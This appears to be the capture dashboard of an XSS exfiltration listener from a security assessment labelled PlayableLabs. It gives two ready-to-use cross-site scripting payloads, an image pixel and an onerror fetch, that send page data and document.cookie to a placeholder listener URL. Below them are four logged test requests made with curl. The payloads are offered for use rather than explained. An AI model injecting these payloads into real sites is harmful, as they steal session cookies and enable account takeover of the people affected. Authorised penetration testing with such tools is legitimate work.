XSS Exfiltration Listener

PlayableLabs Security Assessment — Capture Dashboard

4
Captures

Payloads to Use

IMG pixel (simplest):

<img src=LISTENER_URL/pixel.gif?d=STOLEN_DATA>

Fetch (full exfil):

<img src=x onerror="fetch('LISTENER_URL/capture',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({cookie:document.cookie,url:location.href})})">

Captures

#4 — 2026-03-30T11:24:27.170806 PIXEL
IP: 2405:4802:1d09:7440:b135:3726:cab6:8896 | Origin: N/A 
{
  "d_decoded": "test",
  "ip": "2405:4802:1d09:7440:b135:3726:cab6:8896",
  "method": "PIXEL",
  "query_params": {
    "d": "dGVzdA=="
  },
  "referer": "",
  "timestamp": "2026-03-30T11:24:27.170806"
}
#3 — 2026-03-30T11:24:27.019755 GET
IP: 2405:4802:1d09:7440:b135:3726:cab6:8896 | Origin: 
{
  "ip": "2405:4802:1d09:7440:b135:3726:cab6:8896",
  "method": "GET",
  "origin": "",
  "query_params": {
    "test": "tunnel-ok"
  },
  "referer": "",
  "timestamp": "2026-03-30T11:24:27.019755",
  "user_agent": "curl/8.7.1"
}
#2 — 2026-03-30T11:23:42.350024 GET
IP: 192.168.65.1 | Origin: 
{
  "ip": "192.168.65.1",
  "method": "GET",
  "origin": "",
  "query_params": {
    "test": "working"
  },
  "referer": "",
  "timestamp": "2026-03-30T11:23:42.350024",
  "user_agent": "curl/8.7.1"
}
#1 — 2026-03-30T11:23:29.665514 GET
IP: 192.168.65.1 | Origin: 
{
  "ip": "192.168.65.1",
  "method": "GET",
  "origin": "",
  "query_params": {
    "test": "direct"
  },
  "referer": "",
  "timestamp": "2026-03-30T11:23:29.665514",
  "user_agent": "curl/8.7.1"
}